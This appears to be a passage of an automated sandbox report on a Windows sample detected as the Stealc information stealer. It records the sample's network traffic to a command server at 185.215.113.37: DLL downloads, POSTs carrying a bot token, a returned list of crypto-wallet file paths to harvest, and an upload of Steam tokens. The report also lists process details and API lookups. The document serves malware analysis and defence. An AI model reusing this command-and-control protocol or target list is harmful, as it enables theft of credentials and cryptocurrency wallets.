9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 22:40:17.012492895 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:17.238902092 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 22:40:19.921760082 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:20.152714968 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 22:40:20.542805910 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 22:40:20.769301891 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 22:40:21.351320028 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 22:40:22.963392973 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:22.964170933 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:22.964845896 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:23.011790037 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBK Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="message"wallets------EGHCAKKEGCAAFHJJJDBK--
Sep 26, 2024 22:40:23.240286112 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 22:40:23.243050098 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="message"ybncbhylepme------CAKKJKKECFIDGDHIJEGD--
Sep 26, 2024 22:40:23.488565922 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 4744 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Sep 26, 2024 22:40:23.500305891 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIID Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file"------HDGIEBGHDAEBGDGCFIID--
Sep 26, 2024 22:40:24.227632046 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:24.254918098 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHI Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 2d 2d 0d 0a Data Ascii: ------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="message"files------KECGDBFCBKFIDHIDHDHI--
Sep 26, 2024 22:40:24.482609034 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 22:40:24.483855963 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 65 37 66 38 61 62 37 32 36 61 31 63 37 36 33 66 34 34 39 65 38 35 66 33 63 32 64 31 33 39 62 61 31 65 61 63 62 39 30 39 38 63 30 32 35 63 30 39 31 65 31 33 66 63 35 32 35 39 33 33 64 64 33 65 34 31 62 39 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 2d 2d 0d 0a Data Ascii: ------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="token"615e7f8ab726a1c763f449e85f3c2d139ba1eacb9098c025c091e13fc525933dd3e41b9b------BKFBAECBAEGDGDHIEHIJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKFBAECBAEGDGDHIEHIJ--
Sep 26, 2024 22:40:25.205889940 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 20:40:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	16:39:57
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x690000
File size:	1'901'568 bytes
MD5 hash:	B061AF520EEBE18F1C54E1D95C2DB957
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1717801615.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1991553244.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 006A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01352278), ref: 006A98A1
GetProcAddress.KERNEL32(74DD0000,013524D0), ref: 006A98BA
GetProcAddress.KERNEL32(74DD0000,01352290), ref: 006A98D2
GetProcAddress.KERNEL32(74DD0000,013522A8), ref: 006A98EA
GetProcAddress.KERNEL32(74DD0000,01352350), ref: 006A9903
GetProcAddress.KERNEL32(74DD0000,01359238), ref: 006A991B
GetProcAddress.KERNEL32(74DD0000,01345970), ref: 006A9933
GetProcAddress.KERNEL32(74DD0000,013457D0), ref: 006A994C
GetProcAddress.KERNEL32(74DD0000,013522C0), ref: 006A9964
GetProcAddress.KERNEL32(74DD0000,01352398), ref: 006A997C
GetProcAddress.KERNEL32(74DD0000,013524A0), ref: 006A9995
GetProcAddress.KERNEL32(74DD0000,013522F0), ref: 006A99AD
GetProcAddress.KERNEL32(74DD0000,013458B0), ref: 006A99C5
GetProcAddress.KERNEL32(74DD0000,01352428), ref: 006A99DE
GetProcAddress.KERNEL32(74DD0000,01352368), ref: 006A99F6
GetProcAddress.KERNEL32(74DD0000,01345850), ref: 006A9A0E
GetProcAddress.KERNEL32(74DD0000,01352380), ref: 006A9A27
GetProcAddress.KERNEL32(74DD0000,01352308), ref: 006A9A3F
GetProcAddress.KERNEL32(74DD0000,013459D0), ref: 006A9A57
GetProcAddress.KERNEL32(74DD0000,01352338), ref: 006A9A70
GetProcAddress.KERNEL32(74DD0000,01345870), ref: 006A9A88
LoadLibraryA.KERNEL32(013525A8,?,006A6A00), ref: 006A9A9A
LoadLibraryA.KERNEL32(013525D8,?,006A6A00), ref: 006A9AAB
LoadLibraryA.KERNEL32(01352590,?,006A6A00), ref: 006A9ABD
LoadLibraryA.KERNEL32(013525C0,?,006A6A00), ref: 006A9ACF
LoadLibraryA.KERNEL32(01352578,?,006A6A00), ref: 006A9AE0
GetProcAddress.KERNEL32(75A70000,01352518), ref: 006A9B02
GetProcAddress.KERNEL32(75290000,01352530), ref: 006A9B23
GetProcAddress.KERNEL32(75290000,01352560), ref: 006A9B3B
GetProcAddress.KERNEL32(75BD0000,01352548), ref: 006A9B5D
GetProcAddress.KERNEL32(75450000,01345810), ref: 006A9B7E
GetProcAddress.KERNEL32(76E90000,01359218), ref: 006A9B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 006A9BB6

Strings

NtQueryInformationProcess, xrefs: 006A9BAA

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
